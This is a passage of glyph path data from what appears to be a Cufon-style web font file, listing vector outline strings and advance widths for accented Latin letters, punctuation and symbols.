0,-33,-24,-39,-64,-37r0,-44v52,14,69,-61,20,-63v-11,0,-22,5,-34,16r-29,-32v42,-51,144,-35,142,39v-1,29,-8,39,-32,55v30,13,46,36,46,69","w":192},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm94,-288v0,-21,19,-39,39,-39v20,0,38,18,38,39v0,21,-18,41,-38,40v-21,0,-39,-20,-39,-40xm147,-288v0,-8,-6,-17,-14,-16v-9,-1,-16,7,-15,16v0,7,7,15,15,15v8,0,14,-7,14,-15xm141,-404r57,0r-65,69r-34,0","w":266},{"d":"125,-20r0,90r-48,0r0,-90r-73,-171r49,0r48,113r48,-113r49,0","w":201},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259","w":187},{"d":"30,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm249,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm32,-265r-7,67r-35,0r-7,-67r49,0","w":315},{"d":"53,-176r-27,0r-10,-89r47,0","w":79},{"d":"190,46r-34,0r-116,-312r34,0","w":230},{"d":"54,-144v-54,-33,-26,-124,39,-121r0,-18r33,0r0,20v27,7,37,15,57,34r-34,33v-15,-16,-31,-24,-46,-24v-22,-1,-42,25,-23,40v41,33,117,36,113,107v-2,44,-25,72,-67,79r0,47r-33,0r0,-46v-38,-5,-59,-21,-81,-44r34,-35v21,23,42,35,62,35v27,1,49,-34,30,-57v-15,-18,-75,-39,-84,-50","w":201},{"d":"16,-141v-2,-61,97,-72,125,-24r-29,30v-12,-12,-23,-18,-33,-18v-11,-1,-22,9,-15,19v30,21,81,31,81,79v0,68,-105,79,-136,27r30,-32v10,18,53,35,61,7v3,-11,-24,-24,-37,-30v-31,-16,-47,-35,-47,-58xm5,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":158},{"d":"26,-259r49,0r0,259r-49,0r0,-259","w":100},{"d":"30,-259r47,0r111,171r0,-171r49,0r0,259r-47,0r-111,-170r0,170r-49,0r0,-259","w":266},{"d":"16,-191r147,0r-86,150r81,0r0,41r-155,0r86,-151r-73,0r0,-40xm11,-276r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":165},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm199,38v1,-25,22,-42,57,-38v-16,10,-25,19,-25,29v0,17,19,20,34,12r0,28v-32,7,-68,-2,-66,-31","w":266},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm102,-328v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":266},{"d":"171,-210r-152,0r0,-49r152,0r0,49xm171,-116r-152,0r0,-48r152,0r0,48xm171,0r-152,0r0,-48r152,0r0,48","w":190},{"d":"17,-130v0,-133,179,-177,250,-83r-34,33v-52,-67,-167,-37,-167,50v0,93,122,115,167,52r33,35v-34,32,-57,49,-112,50v-78,1,-137,-57,-137,-137xm125,-303v0,-13,12,-26,25,-26v13,0,26,13,26,26v0,13,-12,25,-26,25v-14,0,-25,-12,-25,-25","w":280},{"d":"30,-259r47,0r111,171r0,-171r49,0r0,259r-47,0r-111,-170r0,170r-49,0r0,-259xm169,44v0,34,-46,43,-80,28r7,-23v15,5,38,5,38,-9v0,-11,-15,-11,-28,-10r5,-16v31,-5,58,5,58,30","w":266},{"d":"27,3r0,-14v20,9,38,22,54,35r0,-281r18,0r0,281v12,-12,30,-24,54,-35r0,14v-30,26,-49,50,-59,72r-9,0v-8,-21,-27,-44,-58,-72","w":180},{"d":"58,-265r45,0r-14,53r40,-38r20,39r-53,14r53,15r-23,38r-38,-38r13,53r-43,0r14,-53r-39,38r-24,-38r54,-15r-54,-15r24,-39r39,39","w":158},{"d":"23,-129v0,-16,11,-28,27,-28v16,0,28,12,28,28v0,16,-12,27,-28,27v-15,0,-27,-12,-27,-27","w":100},{"d":"235,-126v0,87,-42,132,-146,126r-59,0r0,-259r58,0v102,-4,147,44,147,133xm185,-127v0,-61,-36,-89,-106,-84r0,163v71,6,106,-16,106,-79xm28,-328r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":252},{"d":"17,-130v0,-133,179,-177,250,-83r-34,33v-52,-67,-167,-37,-167,50v0,93,122,115,167,52r33,35v-34,32,-57,49,-112,50v-78,1,-137,-57,-137,-137","w":280},{"d":"101,-150v-37,-16,-40,29,-40,73r0,77r-48,0r0,-191r41,0r0,24v9,-22,35,-37,62,-24xm71,-295r57,0r-65,69r-34,0","w":115},{"d":"167,-265v75,0,132,46,131,118v0,40,-19,72,-60,98r65,0r0,49r-119,0r0,-59v43,-22,65,-51,65,-88v1,-44,-35,-70,-82,-70v-47,0,-82,26,-82,70v0,37,22,66,65,88r0,59r-119,0r0,-49r65,0v-41,-26,-61,-58,-61,-98v0,-72,57,-118,132,-118xm32,-265r-7,67r-35,0r-7,-67r49,0","w":320},{"d":"15,-95v0,-83,98,-134,151,-75r0,-95r47,0r0,265r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm226,-265r45,0v2,45,-4,73,-25,99r-18,-14v9,-12,12,-18,16,-35r-18,0r0,-50","w":259},{"d":"19,-191r48,0r0,191r-48,0r0,-191","w":86},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm34,-328r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":187},{"d":"136,-259r169,0r0,49r-91,0r0,47r91,0r0,47r-91,0r0,68r91,0r0,48r-140,0r0,-53r-79,0r-25,53r-51,0xm165,-102r0,-113r-55,113r55,0","w":323},{"d":"70,7r110,-272r30,0r-110,272r-30,0xm13,-262r104,0r0,14r-70,122r-26,-14r55,-95r-63,0r0,-27xm240,-136v38,0,66,39,34,64v41,23,17,81,-33,75v-53,6,-75,-51,-35,-75v-31,-24,-5,-64,34,-64xm240,-83v9,0,16,-6,16,-14v0,-8,-6,-12,-17,-12v-8,1,-14,4,-14,12v0,8,6,14,15,14xm218,-40v0,10,10,16,22,16v15,0,22,-6,22,-16v0,-11,-10,-17,-21,-17v-10,0,-23,6,-23,17","w":302},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm-22,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":100},{"d":"102,-59r-92,-200r56,0r60,145r50,-145r51,0r-69,185v-20,80,-100,108,-154,42r33,-32v20,26,48,30,65,5xm87,-328v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":230},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111","w":230},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm11,-276v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":86},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm50,-278r0,-39r101,0r0,39r-101,0","w":187},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm36,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm114,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":187},{"d":"25,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":194},{"d":"197,0r-72,-190r-72,190r-53,0r100,-259r50,0r99,259r-52,0","w":249},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm83,-328v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":230},{"d":"16,-98v-8,-82,97,-130,150,-72r0,-21r47,0r0,164v19,122,-169,134,-197,41r53,0v17,23,81,21,92,-5v3,-6,5,-18,5,-33v-52,56,-158,5,-150,-74xm168,-98v0,-30,-23,-53,-52,-53v-29,0,-52,23,-52,53v0,31,23,55,53,55v30,1,51,-24,51,-55xm89,-251v0,-13,12,-26,25,-26v13,0,26,13,26,26v0,13,-12,25,-26,25v-14,0,-25,-12,-25,-25","w":237},{"d":"78,-42v16,0,16,-13,16,-36r0,-181r49,0r0,172v16,104,-91,118,-136,56r35,-33v12,13,18,22,36,22xm27,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":172},{"d":"15,-93v0,-67,40,-91,105,-97r0,-44r51,0r0,45v66,2,106,35,106,96v0,59,-38,93,-105,95r0,66r-52,0r0,-65v-65,-3,-105,-33,-105,-96xm120,-157v-53,-6,-67,79,-38,112v10,10,22,16,38,16r0,-128xm171,-157r0,128v52,5,67,-75,40,-111v-9,-11,-22,-17,-40,-17","w":291},{"d":"101,-150v-37,-16,-40,29,-40,73r0,77r-48,0r0,-191r41,0r0,24v9,-22,35,-37,62,-24xm96,44v0,34,-46,43,-80,28r7,-23v15,5,38,5,38,-9v0,-11,-15,-11,-28,-10r5,-16v31,-5,58,5,58,30","w":115},{"d":"18,-131v-7,-125,176,-181,250,-85r-34,34v-52,-65,-167,-33,-167,52v0,83,131,127,164,45r-75,0r0,-46r130,0v3,80,-48,138,-128,138v-84,0,-135,-56,-140,-138xm80,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":302},{"d":"8,-202v-5,-45,42,-83,73,-50r0,-10r35,0r0,120r-35,0r0,-10v-31,31,-78,-6,-73,-50xm63,-171v26,-1,25,-62,0,-63v-25,0,-27,62,0,63","w":129},{"d":"26,-259r49,0r0,259r-49,0r0,-259","w":100},{"d":"30,-259r49,0r0,212r71,0r0,47r-120,0r0,-259xm118,-107v-31,0,-32,-51,0,-51v13,0,26,12,26,25v0,13,-13,26,-26,26","w":158},{"d":"11,-259r53,0r48,93r48,-93r52,0r-75,147r0,112r-50,0r0,-112xm39,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":223},{"d":"46,40v20,0,24,-23,4,-22r-10,0r6,-21r30,0r-2,8v13,3,25,13,25,27v0,36,-49,43,-84,27r6,-23v8,3,17,4,25,4","w":122},{"d":"28,38v1,-25,22,-42,57,-38v-16,10,-25,19,-25,29v0,17,19,20,34,12r0,28v-32,7,-68,-2,-66,-31","w":122},{"d":"17,-127v0,-74,46,-104,123,-108r0,-29r53,0r0,29v82,4,123,40,123,107v0,73,-50,107,-123,108r0,51r-53,0r0,-51v-76,-3,-123,-35,-123,-107xm140,-198v-69,-4,-92,93,-41,129v10,8,24,11,41,12r0,-141xm193,-57v63,5,88,-80,50,-120v-12,-12,-29,-19,-50,-20r0,140","w":333},{"d":"113,-60r-116,0r0,-31r116,0r0,-36r-116,0r0,-31r147,0r0,267r-31,0r0,-169","w":256},{"d":"29,-259r187,0r0,259r-50,0r0,-213r-87,0r0,213r-50,0r0,-259","w":244},{"d":"44,13r31,16r-39,67r-22,-11","w":100},{"d":"18,-131v-7,-125,176,-181,250,-85r-34,34v-52,-65,-167,-33,-167,52v0,83,131,127,164,45r-75,0r0,-46r130,0v3,80,-48,138,-128,138v-84,0,-135,-56,-140,-138xm138,40v20,0,24,-23,4,-22r-10,0r6,-21r30,0r-2,8v13,3,25,13,25,27v0,36,-49,43,-84,27r6,-23v8,3,17,4,25,4","w":302},{"d":"121,0v-2,-22,6,-54,-5,-68r-57,68r-64,0r87,-98r-86,-93r59,0r66,71r0,-71r48,0r0,71r66,-71r59,0r-86,93r87,98r-64,0r-57,-68v-11,13,-2,46,-5,68r-48,0","w":290},{"d":"94,-131r0,-134r28,0r0,125xm94,70r0,-160r28,-10r0,170r-28,0"},{"d":"248,-126v0,87,-42,132,-146,126r-64,0r0,-115r-29,0r0,-29r29,0r0,-115r63,0v102,-4,147,44,147,133xm198,-127v0,-63,-38,-90,-110,-84r0,67r53,0r0,29r-53,0r0,67v72,5,110,-14,110,-79","w":267},{"d":"106,-239v-93,0,-57,143,-64,239r-19,0v4,-111,-26,-262,83,-262v108,0,80,145,83,262r-19,0v-7,-96,29,-239,-64,-239","w":211},{"d":"17,-129v0,-108,124,-174,213,-111r28,-33r22,18r-29,35v79,82,13,227,-99,227v-28,0,-52,-7,-74,-22r-31,35r-22,-19r30,-35v-21,-21,-38,-55,-38,-95xm198,-203v-56,-38,-131,7,-131,75v0,23,7,42,20,57xm109,-53v77,48,167,-52,110,-129xm160,-347r57,0r-65,69r-34,0","w":302},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm140,-288r-7,67r-35,0r-7,-67r49,0","w":230},{"d":"16,-239v-1,-16,15,-31,31,-31v17,0,31,14,31,31v0,17,-15,31,-31,31v-17,0,-31,-14,-31,-31xm-15,30v20,10,38,6,38,-20r0,-201r48,0r0,197v5,59,-35,82,-86,62r0,-38","w":93},{"d":"16,-191r147,0r-86,150r81,0r0,41r-155,0r86,-151r-73,0r0,-40xm60,-251v0,-13,12,-26,25,-26v13,0,26,13,26,26v0,13,-12,25,-26,25v-14,0,-25,-12,-25,-25","w":165},{"d":"128,-193v-3,-38,-51,-33,-50,1v0,5,2,12,6,23r64,0r0,31r-53,0v1,4,2,9,4,17r49,0r0,31r-45,0v-1,13,-5,28,-12,45v23,3,50,14,56,-14r45,0v-1,35,-32,68,-68,66v-31,-2,-72,-14,-99,-1r-16,-42v10,-4,19,-7,28,-8v10,-17,15,-32,16,-46r-44,0r0,-31r41,0v-1,-3,-4,-9,-7,-17r-34,0r0,-31r23,0v-28,-76,68,-125,124,-77v15,13,22,30,22,53r-50,0","w":201},{"d":"15,-95v-5,-101,146,-135,196,-58r-39,22v-31,-39,-109,-19,-109,37v0,56,79,73,109,33r37,26v-21,27,-49,40,-86,40v-63,0,-105,-44,-108,-100xm94,-251v0,-13,12,-26,25,-26v13,0,26,13,26,26v0,13,-12,25,-26,25v-14,0,-25,-12,-25,-25","w":230},{"d":"195,0r-49,0r-48,-121r-48,121r-49,0r82,-191r31,0","w":196},{"d":"183,-184v-3,56,-35,77,-104,74r0,110r-50,0r0,-259v82,-3,158,-1,154,75xm135,-184v0,-26,-26,-26,-56,-26r0,52v30,1,56,2,56,-26","w":201},{"d":"-41,7r110,-272r30,0r-110,272r-30,0","w":57},{"d":"15,-95v-5,-101,146,-135,196,-58r-39,22v-31,-39,-109,-19,-109,37v0,56,79,73,109,33r37,26v-21,27,-49,40,-86,40v-63,0,-105,-44,-108,-100xm49,-276r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":230},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm68,-288r-7,67r-35,0r-7,-67r49,0","w":86},{"d":"108,-103r-56,55r-26,-26r56,-55r-56,-56r26,-26r56,56r55,-56r26,26r-55,56r55,55r-26,26"},{"d":"26,-265r49,0r0,189r-49,0r0,-189xm20,-25v0,-15,15,-30,30,-30v16,0,31,14,31,30v0,16,-15,30,-31,30v-15,0,-30,-15,-30,-30","w":100},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm59,-347r57,0r-65,69r-34,0","w":100},{"d":"184,-329r13,0r-55,343r-87,-180r-35,16r-6,-11r53,-27r71,145","w":197},{"d":"15,-95v0,-64,63,-118,131,-96r102,0r0,45r-48,0v45,60,-11,151,-86,151v-55,0,-99,-46,-99,-100xm167,-96v0,-32,-21,-55,-52,-55v-30,0,-52,24,-52,55v0,32,21,56,52,56v30,0,52,-26,52,-56","w":258},{"d":"113,-94r-116,0r0,-31r147,0r0,234r-31,0r0,-203","w":256},{"d":"19,-265r48,0r0,265r-48,0r0,-265xm104,-107v-31,0,-32,-51,0,-51v13,0,26,12,26,25v0,13,-13,26,-26,26","w":124},{"d":"7,-191r56,0r37,52r38,-52r55,0r-65,90r73,101r-55,0r-46,-63r-45,63r-55,0r73,-101","w":201},{"d":"79,109r0,-203r-82,0r0,-31r82,0r0,-203r31,0r0,203r36,0r0,-203r31,0r0,203r83,0r0,31r-83,0r0,203r-31,0r0,-203r-36,0r0,203r-31,0","w":256},{"d":"50,-176r-27,0r3,-89r47,0","w":79},{"d":"82,-181r19,-21r0,43r-19,22r0,137r-48,0r0,-84r-20,21r0,-43r20,-21r0,-138r48,0r0,84","w":115},{"d":"117,-188v9,-43,-34,-55,-47,-26v-2,5,-3,12,-3,23r28,0r0,40r-28,0r0,151r-48,0r0,-151r-18,0r0,-40r18,0v-1,-53,23,-79,73,-79v51,0,75,23,74,79r0,191r-49,0r0,-188","w":187},{"d":"115,-213v-4,-22,-41,-22,-46,-1v-2,4,-2,12,-2,23r28,0r0,40r-28,0r0,151r-49,0r0,-151r-17,0r0,-40r17,0v-12,-81,93,-101,135,-53v6,8,10,18,12,31r-50,0xm117,-191r48,0r0,191r-48,0r0,-191","w":187},{"d":"129,0r-45,0r33,-96r-33,-95r45,0r32,95xm49,0r-45,0r33,-96r-33,-95r45,0r32,95","w":165},{"d":"37,-191r45,0r-33,96r33,95r-45,0r-32,-95","w":86},{"d":"15,-92v0,-78,80,-112,162,-93r0,35v-45,-12,-104,-4,-108,39r107,0r0,33r-107,0v3,46,62,55,112,44r0,35v-83,15,-166,-11,-166,-93","w":195},{"d":"10,-259r48,0r38,165r46,-165r41,0r47,165r36,-165r49,0r-58,259r-47,0r-48,-167r-47,167r-47,0xm154,-347r42,69r-34,0r-65,-69r57,0","w":323},{"d":"160,-245v-36,43,-85,-8,-127,18r-20,-29v38,-40,87,11,129,-17","w":172},{"d":"4,-259r143,0r0,49r-47,0r0,210r-50,0r0,-210r-46,0r0,-49","w":151},{"d":"77,-265r47,0r-9,82r80,-8r0,47r-80,-9r9,57r-9,56r80,-10r0,49r-80,-10r9,81r-47,0r9,-81r-79,10r0,-49r79,10r-9,-56r9,-57r-79,9r0,-47r79,8","w":201},{"d":"24,-191r112,0r0,45r-64,0r0,146r-48,0r0,-191","w":143},{"d":"218,-259r0,259r-49,0r0,-162r-97,162r-43,0r0,-259r50,0r0,168r97,-168r42,0xm93,-328v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":247},{"d":"20,-119v0,-23,21,-45,44,-44v23,0,44,19,44,44v0,23,-21,44,-44,44v-23,0,-44,-21,-44,-44xm95,-119v0,-16,-15,-31,-31,-31v-16,0,-31,14,-31,31v0,17,15,31,31,31v16,0,32,-14,31,-31","w":127},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm82,-295r57,0r-65,69r-34,0xm160,-295r57,0r-64,69r-35,0"},{"d":"27,-50r45,0v2,45,-4,73,-25,98r-18,-13v8,-12,12,-19,16,-35r-18,0r0,-50","w":100},{"d":"32,-162v-43,-57,29,-130,95,-94v12,6,24,17,38,33r-36,32v-13,-18,-26,-27,-39,-27v-11,0,-22,7,-22,17v17,48,102,68,102,134v0,62,-77,95,-128,60v-14,-9,-25,-24,-35,-43r42,-25v12,23,26,35,42,35v22,1,40,-23,24,-42v-15,-19,-78,-66,-83,-80xm79,40v20,0,24,-23,4,-22r-10,0r6,-21r30,0r-2,8v13,3,25,13,25,27v0,36,-49,43,-84,27r6,-23v8,3,17,4,25,4","w":187},{"d":"-2,20r184,0r0,18r-184,0r0,-18xm-2,51r184,0r0,18r-184,0r0,-18","w":180},{"d":"12,-239v-1,-16,15,-31,31,-31v16,0,31,14,31,31v0,17,-15,31,-31,31v-17,0,-30,-15,-31,-31xm19,-191r48,0r0,191r-48,0r0,-191","w":86},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm61,-278r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":266},{"d":"152,-23v0,-16,12,-27,28,-27v15,0,27,12,27,27v0,16,-11,28,-27,28v-16,0,-28,-12,-28,-28xm32,-23v0,-16,12,-27,28,-27v15,0,28,12,28,27v0,15,-12,28,-28,28v-16,0,-28,-12,-28,-28xm272,-23v0,-16,12,-27,28,-27v15,0,27,12,27,27v0,16,-11,28,-27,28v-16,0,-28,-12,-28,-28","w":360},{"d":"20,-189r176,0r0,119r-44,0r0,-75r-132,0r0,-44"},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm80,-258v0,-21,19,-39,39,-39v20,0,38,18,38,39v0,21,-18,41,-38,40v-21,0,-39,-20,-39,-40xm133,-258v0,-8,-6,-17,-14,-16v-9,-1,-16,7,-15,16v0,7,7,15,15,15v8,0,14,-7,14,-15xm127,-381r57,0r-65,69r-34,0","w":237},{"d":"86,-154r14,0v-9,20,-21,38,-34,54r280,0r0,18r-280,0v12,12,23,30,34,54r-13,0v-26,-30,-51,-50,-73,-60r0,-7v21,-8,44,-28,72,-59","w":360},{"d":"16,-259r156,0r-92,212r86,0r0,47r-158,0r92,-210r-84,0r0,-49xm102,-347r57,0r-65,69r-34,0","w":180},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm65,-278r0,-39r101,0r0,39r-101,0","w":230},{"d":"17,-129v0,-81,44,-135,129,-135v79,0,124,51,124,133v0,86,-45,137,-123,138v-85,1,-130,-51,-130,-136xm216,-128v0,-64,-21,-99,-70,-99v-55,0,-74,36,-74,100v0,60,20,96,72,96v52,0,72,-39,72,-97xm98,-152r92,0r0,41r-92,0r0,-41","w":287},{"d":"29,-259v79,-3,149,-1,155,68r16,0r0,-71r48,0r0,71v64,4,120,-21,151,26r-30,30v-12,-12,-22,-18,-32,-18v-25,2,-21,22,0,28v31,17,65,29,66,70v1,68,-105,79,-136,27r30,-32v8,16,55,36,61,7v3,-11,-25,-23,-38,-30v-34,-18,-50,-35,-45,-67r-27,0r0,150r-48,0r0,-150r-24,0v-13,27,-45,42,-97,43r0,107r-50,0r0,-259xm135,-184v1,-28,-26,-27,-56,-27r0,58v35,-1,55,-3,56,-31","w":416},{"d":"248,-126v0,87,-42,132,-146,126r-64,0r0,-115r-29,0r0,-29r29,0r0,-115r63,0v102,-4,147,44,147,133xm198,-127v0,-63,-38,-90,-110,-84r0,67r53,0r0,29r-53,0r0,67v72,5,110,-14,110,-79","w":267},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm51,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm129,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":230},{"d":"47,-212v25,5,37,-26,14,-26v-8,0,-14,5,-18,13r-32,0v1,-52,92,-52,96,-5v0,11,-6,20,-17,26v50,22,17,78,-32,78v-29,0,-53,-18,-53,-46r33,0v0,25,44,24,44,3v0,-12,-12,-17,-35,-18r0,-25","w":120},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm25,-303v0,-13,12,-26,25,-26v13,0,26,13,26,26v0,13,-12,25,-26,25v-14,0,-25,-12,-25,-25","w":100},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm51,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm129,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":230},{"d":"136,-259r169,0r0,49r-91,0r0,47r91,0r0,47r-91,0r0,68r91,0r0,48r-140,0r0,-53r-79,0r-25,53r-51,0xm165,-102r0,-113r-55,113r55,0xm203,-347r57,0r-65,69r-34,0","w":323},{"d":"184,-203v60,0,112,52,112,112v0,60,-52,112,-112,112v-60,0,-112,-52,-112,-112v0,-60,52,-112,112,-112xm184,5v50,0,96,-46,96,-96v0,-50,-45,-96,-96,-96v-51,0,-96,45,-96,96v0,51,46,96,96,96xm141,-128v7,0,14,7,14,14v0,7,-7,14,-14,14v-7,0,-14,-7,-14,-14v0,-7,7,-14,14,-14xm227,-128v7,0,14,7,14,14v0,7,-7,14,-14,14v-7,0,-14,-7,-14,-14v0,-7,7,-14,14,-14xm132,-55r11,-6v16,33,66,34,81,0r12,6v-22,46,-82,45,-104,0","w":367},{"d":"114,-152v-60,0,-38,91,-42,152r-48,0r0,-191r48,0r0,19v39,-43,122,-26,122,46r0,126r-48,0v-7,-56,22,-152,-32,-152xm52,-276r53,0r20,23r19,-23r52,0r-52,50r-39,0"},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm83,-276v10,19,55,21,65,0r39,0v-1,55,-103,66,-132,26v-6,-8,-9,-16,-11,-26r39,0","w":230},{"d":"133,-170v0,16,-14,30,-30,30v-17,0,-31,-14,-31,-30v-1,-16,15,-30,31,-30v15,0,30,15,30,30xm65,4v4,41,74,31,72,-7r46,0v1,46,-37,78,-85,78v-49,0,-79,-29,-81,-72v-3,-60,68,-58,63,-123r48,0v7,56,-35,84,-59,110v-3,4,-4,9,-4,14","w":201},{"d":"260,-94r-263,0r0,-31r82,0r0,-203r31,0r0,203r36,0r0,-203r31,0r0,203r83,0r0,31","w":256},{"d":"260,-109r-263,0r0,-219r263,0r0,219","w":256},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0","w":266},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm64,-226r0,-39r101,0r0,39r-101,0","w":237},{"d":"122,-107v-31,0,-32,-51,0,-51v13,0,26,12,26,25v0,13,-13,26,-26,26","w":119},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm110,-295r42,69r-34,0r-65,-69r57,0","w":237},{"d":"17,-130v0,-133,179,-177,250,-83r-34,33v-52,-67,-167,-37,-167,50v0,93,122,115,167,52r33,35v-34,32,-57,49,-112,50v-78,1,-137,-57,-137,-137xm81,-328r53,0r20,23r19,-23r52,0r-52,50r-39,0","w":280},{"d":"54,-161v-47,-32,-18,-109,46,-109v39,0,71,32,73,68r-46,0v-2,-25,-43,-34,-48,-10v17,48,104,51,103,117v0,28,-17,45,-38,54v18,16,28,29,30,57v3,57,-84,76,-121,42v-12,-11,-20,-28,-23,-50r45,0v3,26,48,32,51,5v-23,-47,-107,-50,-107,-119v-1,-26,16,-48,35,-55xm116,-60v35,-13,21,-41,-6,-60r-29,-20v-18,6,-29,29,-13,44v8,8,35,27,48,36","w":201},{"d":"16,-141v-2,-61,97,-72,125,-24r-29,30v-12,-12,-23,-18,-33,-18v-11,-1,-22,9,-15,19v30,21,81,31,81,79v0,68,-105,79,-136,27r30,-32v10,18,53,35,61,7v3,-11,-24,-24,-37,-30v-31,-16,-47,-35,-47,-58xm64,40v20,0,24,-23,4,-22r-10,0r6,-21r30,0r-2,8v13,3,25,13,25,27v0,36,-49,43,-84,27r6,-23v8,3,17,4,25,4","w":158},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm43,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0","w":230},{"d":"78,-108r33,0r0,28r-33,0r0,80r-48,0r0,-80r-29,0r0,-28r29,0r0,-42r-25,0r0,-41r25,0r0,-71r48,0r0,71r28,0r0,41r-28,0r0,42","w":107},{"d":"254,0r-241,0r0,-41r98,-218r44,0r99,218r0,41xm196,-48r-63,-142r-63,142r126,0","w":266},{"d":"30,-259r47,0r111,171r0,-171r49,0r0,259r-47,0r-111,-170r0,170r-49,0r0,-259xm207,-297v-36,43,-85,-8,-127,18r-20,-29v38,-40,87,11,129,-17","w":266},{"d":"17,-130v0,-133,179,-177,250,-83r-34,33v-52,-67,-167,-37,-167,50v0,93,122,115,167,52r33,35